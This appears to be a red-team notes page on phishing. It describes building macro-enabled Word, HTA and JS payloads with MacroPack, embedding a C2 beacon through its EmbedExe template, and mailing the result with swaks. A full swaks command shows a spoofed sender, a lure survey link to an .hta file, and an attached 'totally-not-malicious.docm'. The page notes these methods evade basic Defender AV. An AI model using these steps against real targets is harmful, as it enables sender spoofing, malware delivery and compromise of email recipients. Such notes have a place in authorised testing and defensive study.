Phishing
Warning
WIP… Only added basic commmands now that seem to work quite well for test environments with basic security controls aka MS Defender AV.
These most likely wont work against any EDR solution… DYOR.
Word Macros
Important
docx word docs don’t execute macros (they may be contained in the document but in read only mode), create a docm or doc instead
Focus on hta, docm, and js payloads
Macro pack
MacroPack Community is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. It also handles various shortcuts formats.
# List all supported file formats
macro_pack.exe --listformats
# List all available templates
macro_pack.exe --listtemplates
# Craft a payload
...Note
The EmbedExe template has been quite good in the past as it allows you to provide you C2 payload directly via exe or bin , utilising either a smb beacon or http beacon.
When using the smb beacon, you can try and spray the network to guess if its running or not
Sending Emails: swaks
To send emails to a mail service (eg. SMTP, IMAP, etc) from the command line, swaks is your go to tool.
It provides nice features for attaching documents, spoofing senders, etc.
Sending emails with payloads as attachments
# links in body can be used if the user is going to click on it
# otherwise you can also attach files to it
# --server : mail server
# --attach @totally-not-malicious.docm : attach the file name `totally-not-malicious.docm` to the email
# --suppress-data : don't print the attachment back to you
swaks --from vladimir.putin@target.com --to sam.altman@target.com --header 'Subject: Company Notification' --body 'Hi Sam, we want to hear from you! Please complete the following survey. https://mywebsite.com/mysurvey.hta' --server 10.10.10.10 --attach @totally-not-malicious.docm --suppress-data